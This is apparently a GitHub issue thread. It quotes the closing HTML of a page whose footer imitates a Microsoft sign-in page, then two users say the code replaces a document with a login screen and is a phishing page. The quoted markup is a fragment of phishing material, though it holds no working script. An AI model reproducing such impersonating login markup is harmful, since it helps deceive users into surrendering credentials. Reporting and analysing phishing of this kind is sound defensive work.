												<div id="idBoilerPlateText" class="wrap-content boilerplate-text ext-boilerplate-text" style="display:none"></div>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
						<div id="footer" role="contentinfo" class="footer ext-footer">
							<div>
								<div id="footerLinks" class="footerNode text-secondary"> <a id="ftrTerms" href="https://www.microsoft.com/en-IN/servicesagreement/" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a> <a id="ftrPrivacy" href="https://privacy.microsoft.com/en-IN/privacystatement" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a> <a id="moreOptions" href="#" role="button" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a> </div>
							</div>
						</div>
					</div>
				</div>
			</div>
		
	</div>
</body>
<script>
    
</script>

@inshua
Copy link
Author

inshua commented Dec 27, 2023

Note also there is a ton of extra trailing whitespace, and the HTML seems incomplete, but it appears that it is trying to replace the current document with at least part of a login screen...?

Yes, it should be a phishing page, I can open it with IE and chrome. Thank you for examination.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@niloc132 @inshua